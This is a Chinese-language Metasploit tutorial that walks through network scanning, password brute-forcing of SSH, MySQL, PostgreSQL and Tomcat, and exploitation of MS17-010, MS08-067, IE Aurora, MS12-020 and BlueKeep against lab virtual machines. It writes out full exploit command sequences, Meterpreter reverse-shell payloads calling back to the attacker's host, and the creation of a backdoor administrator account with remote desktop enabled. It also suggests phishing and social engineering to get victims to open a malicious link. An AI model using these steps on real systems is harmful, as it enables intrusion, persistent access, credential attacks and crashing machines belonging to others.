一、MSF介绍
1.1 什么是Metasploit
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。
Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
1.2 专业术语
- 渗透攻击(exploit)
测试者利用系统,程序或服务的漏洞进行攻击的一个过程。
- 攻击载荷(payload)
攻击者在目标系统上执行的一段攻击代码,该代码具有反弹连接,创建用户、执行其他系统命令的功能
- shellcode
在目标机器上运行的一段机器指令,成功执行会返回一个shell
- 模块(module)
是指Metasploit框架中所使用的一段软件代码组件。
- 监听器(listener)
监听器是metasploit种用来等待介入网络连接的组件。
二、Metasploit Console
运行msfconsole即可打开msf命令控制接口
查看帮助手册
help
查看exploits
show exploits
查看payloads
show payloads
三、信息收集
3.1 whois查询
msf5 > whois baidu.com
3.2 nslookup
msf5 > nslookup www.baidu.com
3.4 nmap
msf5 > nmap 192.168.244.131
3.5 portscan模块
msf5 > search portscan msf5 > use auxiliary/scanner/portscan/tcp # tcp端口扫描 msf5 auxiliary(scanner/portscan/tcp) > show options # 查看配置参数 msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.244.0/24 # 指定扫描主机网络 rhosts => 192.168.244.0/24 msf5 auxiliary(scanner/portscan/tcp) > setg threads 50 # 指定线程 threads => 50 msf5 auxiliary(scanner/portscan/tcp) > show options # 查看配置 msf5 auxiliary(scanner/portscan/tcp) > set ports 21-25,80,443,3306,8001-8080 # 指定扫描端口范围 ports => 21-25.80,443,3306,8001-8080 msf5 auxiliary(scanner/portscan/tcp) > show options
3.6 smb扫描
msf5 auxiliary(scanner/portscan/tcp) > search smb_version msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > show options msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.244.0/24 rhosts => 192.168.244.0/24 msf5 auxiliary(scanner/smb/smb_version) > show options msf5 auxiliary(scanner/smb/smb_version) > run
3.7 mssql扫描
msf5 auxiliary(scanner/smb/smb_version) > search mssql_ping msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_ping msf5 auxiliary(scanner/mssql/mssql_ping) > show options msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.244.0/24 rhosts => 192.168.244.0/24 msf5 auxiliary(scanner/mssql/mssql_ping) > show options
3.8 ssh扫描
msf5 auxiliary(scanner/mssql/mssql_ping) > search ssh_version msf5 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_version msf5 auxiliary(scanner/ssh/ssh_version) > show options msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.244.0/24 rhosts => 192.168.244.0/24 msf5 auxiliary(scanner/ssh/ssh_version) > show options msf5 auxiliary(scanner/ssh/ssh_version) > run
靶机防火墙和selinux开启状态(centos 6.9 x64)
3.9 Telnet扫描
msf5 auxiliary(scanner/ssh/ssh_version) > search telnet_version msf5 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/telnet/telnet_version msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.244.0/24 rhosts => 192.168.244.0/24 msf5 auxiliary(scanner/telnet/telnet_version) > show options msf5 auxiliary(scanner/telnet/telnet_version) > run
3.10 ftp扫描
防火墙要允许ftp流量通过
msf5 auxiliary(scanner/telnet/telnet_version) > search ftp_version msf5 auxiliary(scanner/telnet/telnet_version) > use 0 msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.244.0/24 rhosts => 192.168.244.0/24 msf5 auxiliary(scanner/ftp/ftp_version) > show options msf5 auxiliary(scanner/ftp/ftp_version) > run
3.11 扫描FTP匿名登录
msf5 auxiliary(scanner/ftp/ftp_version) > search ftp/anonymous msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.244.0/24 rhosts => 192.168.244.0/24 msf5 auxiliary(scanner/ftp/anonymous) > run
3.12 扫描主机存活
msf5 > search arp_sweep msf5 > use auxiliary/scanner/discovery/arp_sweep msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.244.0/24 rhosts => 192.168.244.0/24 msf5 auxiliary(scanner/discovery/arp_sweep) > show options msf5 auxiliary(scanner/discovery/arp_sweep) > run
3.13 扫描网站目录
msf5 auxiliary(scanner/discovery/arp_sweep) > search dir_scanner msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/dir_scanner msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.244.130 rhosts => 192.168.244.130 msf5 auxiliary(scanner/http/dir_scanner) > run
3.14 搜索网站中的E-mail地址
msf5 auxiliary(scanner/http/dir_scanner) > search search_email_collector msf5 auxiliary(scanner/http/dir_scanner) > use auxiliary/gather/search_email_collector msf5 auxiliary(gather/search_email_collector) > show options msf5 auxiliary(gather/search_email_collector) > set doamin xxx.com doamin => www.qufu123.com msf5 auxiliary(gather/search_email_collector) > set SEARCH_GOOGLE false SEARCH_GOOGLE => false # 如果无法访问GOOGLE 执行此命令 msf5 auxiliary(gather/search_email_collector) > run
3.15 sniffer 嗅探抓包
msf5 auxiliary(gather/search_email_collector) > search sniffer msf5 auxiliary(gather/search_email_collector) > use auxiliary/sniffer/psnuffle msf5 auxiliary(sniffer/psnuffle) > show options msf5 auxiliary(sniffer/psnuffle) > run
使用Serv-U开启FTP服务——如下图所示:抓取未加密流量
四、MSF密码破解
4.1 SSH服务口令猜测
msf5 > search ssh_login msf5 > use auxiliary/scanner/ssh/ssh_login msf5 auxiliary(scanner/ssh/ssh_login) > show options msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /tmp/sshpass.txt pass_file => /tmp/sshpass.txt msf5 auxiliary(scanner/ssh/ssh_login) > set username root username => root msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.244.132 rhosts => 192.168.244.132 msf5 auxiliary(scanner/ssh/ssh_login) > show options msf5 auxiliary(scanner/ssh/ssh_login) > run
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -l msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1 # 1 表示sesion ID
4.2 MySQL 口令攻击
目标靶机使用的Metasploitable2
msf5 > search mysql_login msf5 > use auxiliary/scanner/mysql/mysql_login msf5 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.244.136 rhosts => 192.168.244.136 msf5 auxiliary(scanner/mysql/mysql_login) > set user_file /root/username.txt user_file => /root/username.txt msf5 auxiliary(scanner/mysql/mysql_login) > set pass_file /root/password.txt pass_file => root/password.txt msf5 auxiliary(scanner/mysql/mysql_login) > exploit
4.3 postgresql攻击
msf5 > search postgres_login msf5 auxiliary(scanner/mysql/mysql_login) > use auxiliary/scanner/postgres/postgres_login msf5 auxiliary(scanner/postgres/postgres_login) > set rhosts 192.168.244.136 rhosts => 192.168.244.136 msf5 auxiliary(scanner/postgres/postgres_login) > set user_file /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt user_file => /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt msf5 auxiliary(scanner/postgres/postgres_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt pass_file => /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt msf5 auxiliary(scanner/postgres/postgres_login) > exploit
4.4 Tomcat攻击
Tomcat默认存在一个管理后台,默认的管理地址是http://IP:端口/manager/html。通过此后台,可以在不重启Tomcat服务的情况西安方便地部署、启动、停止或卸载Web应用。但是如果配置不当的话就存在很大的安全隐患。攻击者利用这个漏洞,可以非常快速、轻松地入侵一台服务器。
目标靶机使用的Metasploitable2
msf5 > search tomcat_mgr_login msf5 > use auxiliary/scanner/http/tomcat_mgr_login msf5 auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt msf5 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.244.136 rhosts => 192.168.244.136 msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180 rport => 8180 msf5 auxiliary(scanner/http/tomcat_mgr_login) > exploit
4.5 攻击Telnet服务
目标靶机使用的Metasploitable2
msf5 > search telnet_version msf5 auxiliary(scanner/http/tomcat_mgr_login) > use auxiliary/scanner/telnet/telnet_version msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.244.136 rhosts => 192.168.244.136 msf5 auxiliary(scanner/telnet/telnet_version) > exploit
4.6 攻击Samba服务
msf5 > search smb_version msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.244.136 rhosts => 192.168.244.136 msf5 auxiliary(scanner/smb/smb_version) > exploit
假如通过SMB爆破出目标主机的用户及密码、目标主机又没有开启RDP时,可以使用psexec.exe \\目标主机地址 -l administrator -p 1234567 cmd.exe
五、Metasploit漏洞利用
5.1 ms17-010 漏洞利用
靶机:cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso
(1)扫描主机存在的漏洞
root@kali:~# nmap --script smb-vuln* 192.168.244.137
(2)msf ms17-010漏洞利用
msf5 auxiliary(scanner/discovery/arp_sweep) > search ms17-010
msf5 auxiliary(scanner/discovery/arp_sweep) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.244.137 rhosts => 192.168.244.137 msf5 exploit(windows/smb/ms17_010_eternalblue) > run
查看当前用户
C:\Windows\system32>whoami
添加一个用户
C:\Windows\system32>net user sys 123 /add
把新建的用户添加至管理员组
C:\Windows\system32>net localgroup administrators sys /add
设置远程桌面端口
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
开启远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
# 关闭远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0
检查远程桌面3389端口状态
netstat -an|find "3389"
kali 使用rdesktop RDP远程Windows
# 如果没有安装rdesktop 可以执行如下命令安装
apt-get install rdesktop
kali RDP远程Windows
root@kali:~# rdesktop -f -a 16 192.168.244.137
点击“是”
连接成功
4.2 ms08-067漏洞利用
靶机是 XP (xp启动445)
(1)nmap扫描主机存在的漏洞
root@kali:~# nmap --script smb-vuln* 192.168.244.138
确定目标主机系统指纹
root@kali:~# nmap -O 192.168.244.138
(2)msf ms08-067漏洞利用
msf5 > search ms08-067 msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options
指定目标主机
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.244.138
查看Exploit target:
msf5 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) 6 Windows XP SP3 English (AlwaysOn NX) 7 Windows XP SP3 English (NX) 8 Windows XP SP2 Arabic (NX) 9 Windows XP SP2 Chinese - Traditional / Taiwan (NX) 10 Windows XP SP2 Chinese - Simplified (NX) 11 Windows XP SP2 Chinese - Traditional (NX) 12 Windows XP SP2 Czech (NX) 13 Windows XP SP2 Danish (NX) 14 Windows XP SP2 German (NX) 15 Windows XP SP2 Greek (NX) 16 Windows XP SP2 Spanish (NX) 17 Windows XP SP2 Finnish (NX) 18 Windows XP SP2 French (NX) 19 Windows XP SP2 Hebrew (NX) 20 Windows XP SP2 Hungarian (NX) 21 Windows XP SP2 Italian (NX) 22 Windows XP SP2 Japanese (NX) 23 Windows XP SP2 Korean (NX) 24 Windows XP SP2 Dutch (NX) 25 Windows XP SP2 Norwegian (NX) 26 Windows XP SP2 Polish (NX) 27 Windows XP SP2 Portuguese - Brazilian (NX) 28 Windows XP SP2 Portuguese (NX) 29 Windows XP SP2 Russian (NX) 30 Windows XP SP2 Swedish (NX) 31 Windows XP SP2 Turkish (NX) 32 Windows XP SP3 Arabic (NX) 33 Windows XP SP3 Chinese - Traditional / Taiwan (NX) 34 Windows XP SP3 Chinese - Simplified (NX) 35 Windows XP SP3 Chinese - Traditional (NX) 36 Windows XP SP3 Czech (NX) 37 Windows XP SP3 Danish (NX) 38 Windows XP SP3 German (NX) 39 Windows XP SP3 Greek (NX) 40 Windows XP SP3 Spanish (NX) 41 Windows XP SP3 Finnish (NX) 42 Windows XP SP3 French (NX) 43 Windows XP SP3 Hebrew (NX) 44 Windows XP SP3 Hungarian (NX) 45 Windows XP SP3 Italian (NX) 46 Windows XP SP3 Japanese (NX) 47 Windows XP SP3 Korean (NX) 48 Windows XP SP3 Dutch (NX) 49 Windows XP SP3 Norwegian (NX) 50 Windows XP SP3 Polish (NX) 51 Windows XP SP3 Portuguese - Brazilian (NX) 52 Windows XP SP3 Portuguese (NX) 53 Windows XP SP3 Russian (NX) 54 Windows XP SP3 Swedish (NX) 55 Windows XP SP3 Turkish (NX) 56 Windows 2003 SP1 English (NO NX) 57 Windows 2003 SP1 English (NX) 58 Windows 2003 SP1 Japanese (NO NX) 59 Windows 2003 SP1 Spanish (NO NX) 60 Windows 2003 SP1 Spanish (NX) 61 Windows 2003 SP1 French (NO NX) 62 Windows 2003 SP1 French (NX) 63 Windows 2003 SP2 English (NO NX) 64 Windows 2003 SP2 English (NX) 65 Windows 2003 SP2 German (NO NX) 66 Windows 2003 SP2 German (NX) 67 Windows 2003 SP2 Portuguese - Brazilian (NX) 68 Windows 2003 SP2 Spanish (NO NX) 69 Windows 2003 SP2 Spanish (NX) 70 Windows 2003 SP2 Japanese (NO NX) 71 Windows 2003 SP2 French (NO NX) 72 Windows 2003 SP2 French (NX)
设置target (靶机是Winows XP SP3中文简体版、所以设置target为34)
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
查看配置
msf5 exploit(windows/smb/ms08_067_netapi) > show options
设置payload meterpreter载荷
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms08_067_netapi) > show options
设置监听地址
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.244.128 # 靶机连接的地址(一般是公网地址)这里设置为kali地址 lhost => 192.168.244.128 msf5 exploit(windows/smb/ms08_067_netapi) > set lport 1122 # 靶机建立连接端口 lport => 1122 msf5 exploit(windows/smb/ms08_067_netapi) > show options
msf5 exploit(windows/smb/ms08_067_netapi) > run
进程迁移/进程注入
meterpreter > ps meterpreter > migrate 660
启动vnc
meterpreter > run vnc
调用系统cmd
meterpreter > shell
挂起会话
meterpreter > background
查看挂机的会话
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -l
连接会话
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 1
4.3 ms10_002 IE浏览器漏洞
msf5 exploit(windows/smb/ms08_067_netapi) > search ms10_002_aurora
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/browser/ms10_002_aurora
msf5 exploit(windows/browser/ms10_002_aurora) > show options
设置srchost(自己kali的地址,让目标主机连接)
msf5 exploit(windows/browser/ms10_002_aurora) > set srchost 192.168.244.128 srchost => 192.168.244.128 msf5 exploit(windows/browser/ms10_002_aurora) > set sevport 8080 sevport => 8080
设置meterpreter
msf5 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
设置监听地址(kali主机IP)
msf5 exploit(windows/browser/ms10_002_aurora) > set lhost 192.168.244.128 lhost => 192.168.244.128 msf5 exploit(windows/browser/ms10_002_aurora) > set lport 1123 lport => 1123 msf5 exploit(windows/browser/ms10_002_aurora) > show options
设置target(无需设置)
启动
msf5 exploit(windows/browser/ms10_002_aurora) > run
如下图所示:生成连接http://192.168.244.128:8080/EMoyg47 让其他人访问(钓鱼、社工等等方式 让别人访问)
找个windows IE浏览器访问(这里xp)
到kali查看是否建立会话(如下图所示,成功连接会话)
测试,连接会话
msf5 exploit(windows/browser/ms10_002_aurora) > sessions -i 3
4.4 ms12-020漏洞(蓝屏)
msf5 exploit(windows/browser/ms10_002_aurora) > search ms12-020
msf5 exploit(windows/browser/ms10_002_aurora) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options
靶机是windows 7
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 192.168.244.137 rhosts => 192.168.244.137 msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run
Widnows 7已蓝屏
4.5 cve_2019_0708_bluekeep漏洞(蓝屏)
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > search cve_2019_0708_bluekeep
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
设置目标主机及target (这里靶机是Windows 7 sp1 vmware 15.5.0 设置target 为5,正常需要先对目标主机系统指纹识别)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.244.137 rhosts => 192.168.244.137 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 5 target => 5 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
启动攻击
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
靶机window 7 已蓝屏
